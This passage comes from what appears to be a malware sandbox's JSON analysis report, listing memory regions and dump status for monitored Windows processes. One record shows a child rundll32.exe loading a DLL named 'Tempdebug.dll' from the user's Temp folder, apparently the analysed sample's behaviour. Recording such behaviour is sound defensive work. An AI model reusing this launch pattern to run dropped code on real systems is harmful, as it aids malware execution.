"norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:47.154", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_851", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:47.154", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_852", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:47.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_853", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_854", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:47.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_855", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_856", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_857", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.158", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000858-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_858", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:47.159", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000859-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_859", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:47.159", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000860-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_860", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:47.159", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000861-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_861", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:47.160", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000862-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_862", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:47.160", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000863-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_863", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:47.160", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000864-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_864", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.160", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS", "filename": "c:\\windows\\system32\\rundll32.exe", "id": "proc_6", "image_name": "rundll32.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00000865-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_865", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_866", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_867", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:47.167", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000868-addr_0x0000000000110000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_868", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:47.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 9363455, "entry_point": 9312140, "filename": "\\Windows\\System32\\rundll32.exe", "id": "region_869", "name": "rundll32.exe", "norm_filename": "c:\\windows\\system32\\rundll32.exe", "region_type": "memory_mapped_file", "start_va": 9306112, "timestamp": "00:00:47.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_870", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_871", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_872", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.170", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000873-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_873", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:47.170", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000874-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_874", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_875", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_876", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:47.183", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000877-addr_0x0000000000270000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_877", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:47.183", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000878-addr_0x0000000000490000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_878", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:00:47.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_879", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:47.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_880", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:47.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_881", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:47.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_882", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:47.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_883", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:47.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_884", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:47.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1992491008, "type": "region", "version": 1 }, "end_va": 1992663039, "entry_point": 1992495866, "filename": "\\Windows\\System32\\imagehlp.dll", "id": "region_885", "name": "imagehlp.dll", "norm_filename": "c:\\windows\\system32\\imagehlp.dll", "region_type": "memory_mapped_file", "start_va": 1992491008, "timestamp": "00:00:47.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_886", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:47.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_887", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2195455, "entry_point": 0, "filename": null, "id": "region_888", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:47.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_889", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:47.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_890", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:47.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_891", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:47.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_892", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:47.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\System32\\en-US\\rundll32.exe.mui", "id": "region_893", "name": "rundll32.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\rundll32.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:00:47.199", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000894-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_894", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:47.200", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000895-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_895", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:47.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_896", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:00:47.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_897", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:47.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4657151, "entry_point": 0, "filename": null, "id": "region_898", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:00:47.200", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000899-addr_0x0000000000530000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_899", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:00:47.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 9371648, "type": "region", "version": 1 }, "end_va": 21954559, "entry_point": 0, "filename": null, "id": "region_900", "name": "pagefile_0x00000000008f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9371648, "timestamp": "00:00:47.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 548864, "start_va": 1592852480, "type": "region", "version": 1 }, "end_va": 1593401343, "entry_point": 1592883211, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", "id": "region_901", "name": "tempdebug.dll", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll", "region_type": "memory_mapped_file", "start_va": 1592852480, "timestamp": "00:00:47.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_902", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:47.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_903", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:47.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_904", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:47.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_905", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:47.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, 